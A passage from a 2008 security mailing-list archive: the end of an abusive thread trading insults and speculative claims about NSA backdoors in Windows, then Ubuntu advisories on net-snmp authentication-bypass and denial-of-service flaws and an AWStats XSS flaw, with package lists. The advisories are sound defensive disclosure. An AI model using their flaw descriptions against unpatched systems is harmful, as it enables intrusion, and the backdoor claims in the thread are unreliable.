<4b6ee9310812031403v72e4bd05ne7336fdd9b01b94d@mail.gmail.com> There are no kiddies on the group and any that appear get banned. On Wed, Dec 3, 2008 at 4:28 PM, j-f sentier wrote: > If there's a peace of shit around here that should be flushed, it's only you > n3tcr4p > No one like you, get the fuck back on your kiddie mailing list/group. > > > > > 2008/12/3 n3td3v >> >> You're like a shite that won't flush away. >> >> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: >> > all speculation: >> > >> > no 1 knows 4 sure. >> > >> > http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss >> > >> > http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ >> > >> > http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm >> > >> > c how i did that n3td3v? i posted links, nd talked about the article >> > w/out stealing ppls work. >> > >> > pay attention. >> > >> > >> > On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight >> > wrote: >> >> 2008/12/2 Ureleet >> >>> >> >>> u arent getting it. >> >>> >> >>> it has nothing 2 do w/ backdoors. they r talking about actual >> >>> backdoors in the code. so that anyone who knows the backdoor can >> >>> acess any windows system regarless. they r saying that microsoft has >> >>> coded backdoors into the system so that the govt can get into any >> >>> system, patched or not. pay attention. >> >> >> >> I haven't seen anything that suggests that systems are/will be >> >> backdoored >> >> here. The text of the statement said "remote searches" which in legal >> >> terms >> >> could be anything from something as simple as browsing shared files >> >> available through P2P to full remote system access. >> >> >> >> Do you have anything else that suggests Windows has backdoors present >> >> other >> >> than this statement? >> >> >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > From kees at ubuntu.com Wed Dec 3 22:41:30 2008 From: kees at ubuntu.com (Kees Cook) Date: Wed, 3 Dec 2008 14:41:30 -0800 Subject: [Full-disclosure] [USN-685-1] Net-SNMP vulnerabilities Message-ID: <20081203224130.GQ25309@outflux.net> =========================================================== Ubuntu Security Notice USN-685-1 December 03, 2008 net-snmp vulnerabilities CVE-2008-0960, CVE-2008-2292, CVE-2008-4309 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libsnmp-perl 5.2.1.2-4ubuntu2.3 libsnmp9 5.2.1.2-4ubuntu2.3 Ubuntu 7.10: libsnmp-perl 5.3.1-6ubuntu2.2 libsnmp10 5.3.1-6ubuntu2.2 Ubuntu 8.04 LTS: libsnmp-perl 5.4.1~dfsg-4ubuntu4.2 libsnmp15 5.4.1~dfsg-4ubuntu4.2 Ubuntu 8.10: libsnmp15 5.4.1~dfsg-7.1ubuntu6.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Wes Hardaker discovered that the SNMP service did not correctly validate HMAC authentication requests. An unauthenticated remote attacker could send specially crafted SNMPv3 traffic with a valid username and gain access to the user's views without a valid authentication passphrase. (CVE-2008-0960) John Kortink discovered that the Net-SNMP Perl module did not correctly check the size of returned values. If a user or automated system were tricked into querying a malicious SNMP server, the application using the Perl module could be made to crash, leading to a denial of service. This did not affect Ubuntu 8.10. (CVE-2008-2292) It was discovered that the SNMP service did not correctly handle large GETBULK requests. If an unauthenticated remote attacker sent a specially crafted request, the SNMP service could be made to crash, leading to a denial of service. (CVE-2008-4309) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.diff.gz Size/MD5: 75402 9655d984a47cec8e27efa4db0b227870 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2-4ubuntu2.3.dsc Size/MD5: 838 17a17230a005c1acfd0569757e728fad http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.2.1.2.orig.tar.gz Size/MD5: 3869893 34159770a7fe418d99fdd416a75358b1 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.2.1.2-4ubuntu2.3_all.deb Size/MD5: 1152306 f7647cee4df8db87ab48c0d05635a973 http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.2.1.2-4ubuntu2.3_all.deb Size/MD5: 822946 b9b852c188937d1fffc06d4da01325d5 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_amd64.deb Size/MD5: 896620 a78012b3f0f13667081f97dc1a4d62e8 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_amd64.deb Size/MD5: 1497194 7d55b8d1e4ae0c45753bedcf536a1a5a http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_amd64.deb Size/MD5: 1826252 0550c1401f9bbe5f345fd96484ed369c http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_amd64.deb Size/MD5: 889330 5ad0ddb2c610973166e4dd07769ba3d3 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_amd64.deb Size/MD5: 797086 18cf4210342b683d3ee24fe995329b55 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_i386.deb Size/MD5: 896880 298d27ea1ece6e80bb8931b9a5e61961 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_i386.deb Size/MD5: 1268472 acbca43ab7ea747fa3e4636d15ef997c http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_i386.deb Size/MD5: 1710342 bd27290685bcf1d6a23eb8705d3367e7 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_i386.deb Size/MD5: 881838 58121bd9e4c845da7df4e540645e0e13 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_i386.deb Size/MD5: 794672 221d1c554bd89f50dc3ac9108a6cef6b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_powerpc.deb Size/MD5: 913064 45a033b01c4b31ef90a92988bb5fb229 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_powerpc.deb Size/MD5: 1590124 b62aa5477d9307d311c811298b7ec3d9 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_powerpc.deb Size/MD5: 1728094 5214ce9aebe3a8d7a28a1746a81ce8ea http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_powerpc.deb Size/MD5: 898580 86e6c1b5dfb5bf91f63d7c6786b7abae http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_powerpc.deb Size/MD5: 796092 1bab28407224f782b2c3ae04b4647333 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.2.1.2-4ubuntu2.3_sparc.deb Size/MD5: 896832 3d233db9682d5654fdad6bc6b5a649ba http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9-dev_5.2.1.2-4ubuntu2.3_sparc.deb Size/MD5: 1485268 064304ead0ca4653136376e8e9039e74 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp9_5.2.1.2-4ubuntu2.3_sparc.deb Size/MD5: 1706490 cb76027eb8167e0866a81b93a4da28ed http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.2.1.2-4ubuntu2.3_sparc.deb Size/MD5: 883182 d1ffc12427d92be51efdba3349e74f9a http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.2.1.2-4ubuntu2.3_sparc.deb Size/MD5: 796374 0f3f749ebe4af6111fe49316639004e4 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.diff.gz Size/MD5: 94646 8b6f9380d9f8c5514a1d4db729c6df04 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1-6ubuntu2.2.dsc Size/MD5: 1287 f53866efd3ae4f3c939a77b1005e1f11 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.3.1.orig.tar.gz Size/MD5: 4210843 360a9783dbc853bab6bda90d961daee5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.3.1-6ubuntu2.2_all.deb Size/MD5: 484306 f2d03276d1cdcef7e8b276ad8ca9595d http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.3.1-6ubuntu2.2_all.deb Size/MD5: 901284 6889b371d4de92eb61bf83b89d8a8c37 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_amd64.deb Size/MD5: 2541692 1e6de4bd3c3baa444a2e1980a593a40e http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_amd64.deb Size/MD5: 968940 7efe4bdcb99f311f1c4bb2c3b9d24a4e http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_amd64.deb Size/MD5: 1200930 821861c24499cfdfa2a82c329c610c16 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_amd64.deb Size/MD5: 996572 00cc1a4c8c7924124984e666563e73d0 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_amd64.deb Size/MD5: 908792 a40763280a3bdbe60eca5e07c5d6c30c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_i386.deb Size/MD5: 2321524 59d44616802197e1227cf88abddefe36 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_i386.deb Size/MD5: 967106 a6e5b308d889bdf6f5abe454e35ba474 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_i386.deb Size/MD5: 1124462 ec99daa26d0fafba6e9f0b874a23bf3d http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_i386.deb Size/MD5: 991956 cb20b6a4d68a858ffa0846431169d411 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_i386.deb Size/MD5: 907546 1ab5119e23a16e99203c113d49fc2723 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_lpia.deb Size/MD5: 2305548 da57690a3327196e0c3684735be23f2e http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_lpia.deb Size/MD5: 968984 8da336a5fd871be10e6b8d66d3b9c9d3 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_lpia.deb Size/MD5: 1074500 e4d6690a6a6a543fc0244a29cd350c9b http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_lpia.deb Size/MD5: 989566 2d2f4b1662e6a2dffafe8e98f00a15e7 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_lpia.deb Size/MD5: 907596 4274e006754ebc836132166e0f0429a0 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_powerpc.deb Size/MD5: 2641202 9b2ec56463ee715752b780aa332d8cd0 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_powerpc.deb Size/MD5: 985722 a2fca8426b7b51e98c39b91a468bf71f http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_powerpc.deb Size/MD5: 1154496 6073239f7ffead2a5b9c3357ada1602c http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_powerpc.deb Size/MD5: 1018596 af12cc55597a0d2d3a92b4b5d683bb14 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_powerpc.deb Size/MD5: 911866 57e2246930e712bdc1b039840d43af48 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 2527568 19b1a0971259a9b99f9c0386f5935bfc http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 970264 d8ae7f0bb10375ad487b14ba031cd013 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 1078842 2401fc4c40352b8c8013e8c5de3b0ecd http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 995228 16b230d3c718d8eb4a023126bd09d7f5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 908708 1e410a8ddac41ad9faec901c5a638f29 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.diff.gz Size/MD5: 78642 b4acf50e47be498e579b934f32081d25 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.dsc Size/MD5: 1447 0abcea5df87851df2aae7ebd1fc00e7a http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz Size/MD5: 4618308 0ef987c41d3414f2048c94d187a2baeb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-4ubuntu4.2_all.deb Size/MD5: 526864 f3a131bf5a4f5c547573430cb66d410c http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-4ubuntu4.2_all.deb Size/MD5: 102072 2f276f50efdb7e34f7e61f132f7f7cd7 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 1796950 283c5a95206ab74062e0e30eba4e0890 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 142522 9fff294368a7eac39e37fa478ac6609d http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 1296694 d0646a1543c51f14a93b40f972bc1569 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 163178 0378a25e3b2a0bc80ddb8ec720b5557d http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 75960 fcba461f2e2376cad515329791e04a17 http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 38512 21d9ecbc86a8e5965047d027e94fd324 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 1556806 39e4f63b841c4b36c022017d66c12f58 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 179478 5f08596ae997792920e238ff8cd2a7ba http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 1098794 38bc61a5b403fb4f626a641a5f13e681 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 157954 66e38c37639f3c68e7e4a933fa953ff3 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 74116 50b3a4d0cfd38585d2711d30cf725e9d http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 75038 98cdeec4b1014568b00107a82fc74418 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 1552018 d9dcab084f3b9bf3e8c36cb5db8f141e http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 141508 96061180809cccc975e0d7079e07ed3e http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 1171530 2d91048fe0a2ac9e3a4fddb84c67513e http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 155564 c67ba3aeb2535ee3e7fc4c89e90ba36a http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 74274 db05202893f516398bbe4e2153ef2d6e http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 35552 a75caf212ffb5a0eafe4ba2656c9aae1 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 1874428 0ed8b5f4e6bad74d506d73447de00bd2 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 158374 dfcd7c4455b4bbd3f746368058d09a59 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 1238226 b5b3a81e956cdb14674d571694d1b6d0 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 185314 5e9d8bd56493f75ae8a8691c530aa420 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 83106 75dea32ec7152b7868fabf09d9d5a198 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 42928 214fe703fced2e387b48b51dcbb1d6b7 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 1760062 ade4c08289d947d092a5b2ab06517cc7 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 143860 62b7260d618531b0ed5e7871ab7b99a9 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 1159702 28ea81660bbdd9d7982be58d225e8814 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 160236 196e493ce73905446a3764e73b99f332 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 75518 f24e4b0e3e4a7d97c28da99cdc0a47a5 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 38240 873f5e820e381ec2254ed520bcd09af0 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.diff.gz Size/MD5: 82260 85fb58aa81933f142bd937bca2e18341 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.dsc Size/MD5: 1956 1ee06f6b731eae435af6a2d438ef909b http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz Size/MD5: 4618308 0ef987c41d3414f2048c94d187a2baeb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-7.1ubuntu6.1_all.deb Size/MD5: 527650 9c56f3d70018b714895a61c0daba9498 http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-7.1ubuntu6.1_all.deb Size/MD5: 103060 108eb50387ca46b4ee38ebb8722ced88 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 1815638 82385081fe2d4eeb1a6c94f9dae672ad http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 146154 1b6249e02e89213f2f4d2aa9c9123420 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 1315628 8443e091f2c63485a422236ad23e55cd http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 165522 154a05824b98e041ceac60ac83709ef4 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 77914 8d6e328f309e78bf1fcf21c2633d82ec http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 39930 6b7a1a67ca63b5c843ce66f3547b3c89 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 1569568 dd0599b150eccee9889325d17a7b0769 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 184264 52a54aebef81648164a5bc90f27b0cc5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 1119072 10c81fe283b25e7ad31fcfd88a2325f0 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 156112 6296f0836bc9797ff48810c79965c3a5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 74476 bd96a6915eb97fed083aac4daa5f07cf http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 77652 3e30e51c362dfa982a3b3197be081328 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 1557614 065f4575c7a2d257fa6b5b9d0cee454f http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 144292 b55f2c4aff8a86499d7f38fd6e773f44 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 1184272 84116fefdce279ce338ffc9614384c06 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 154444 ffe9e765a01695355bdb58008a2910f5 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 73746 762e75672fbd395d2d159513f5d572b0 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 36530 0a98b51b94a5f75d4131d657aa766579 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 1884632 a3ad023841ee605efa1e055712b44d9a http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 161074 5586adea8200d2d5bf81f288b5bf7be2 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 1249636 48ec688499fea1dc0ccb3091c0158fb8 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 181952 8ef5f6b9b6c6b8e4fcd5cb37147304a2 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 81802 965218126fb5a49cfcd9e20afeb49782 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 43048 09f2f9ed9f519ca5723411802e46d48b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 1759316 46455cc355c1b808243eada0f134d00b http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 145164 2cdb5b35db853c7c184a44022fc23cd8 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 1159834 cfff424e5bff38bb3ef9419f03465388 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 163042 354f7a5423a34c411c5f8620c66d3e58 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 76994 ca11bcf9a411f618e35e1d6b6ab8c8f9 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 38526 172493ec5df1866e2633e074c7f38775 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081203/8b63f5d7/attachment.bin From kees at ubuntu.com Thu Dec 4 00:16:57 2008 From: kees at ubuntu.com (Kees Cook) Date: Wed, 3 Dec 2008 16:16:57 -0800 Subject: [Full-disclosure] [USN-686-1] AWStats vulnerability Message-ID: <20081204001657.GV25309@outflux.net> =========================================================== Ubuntu Security Notice USN-686-1 December 04, 2008 awstats vulnerability CVE-2008-3714 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: awstats 6.5-1ubuntu1.3 Ubuntu 7.10: awstats 6.6+dfsg-1ubuntu0.1 Ubuntu 8.04 LTS: awstats 6.7.dfsg-1ubuntu0.1 Ubuntu 8.10: awstats 6.7.dfsg-5ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Morgan Todd discovered that AWStats did not correctly strip quotes from certain parameters, allowing for an XSS attack when running as a CGI. If a user was tricked by a remote attacker into following a specially crafted URL, the user's authentication information could be exposed for the domain where AWStats was hosted. Updated packages for 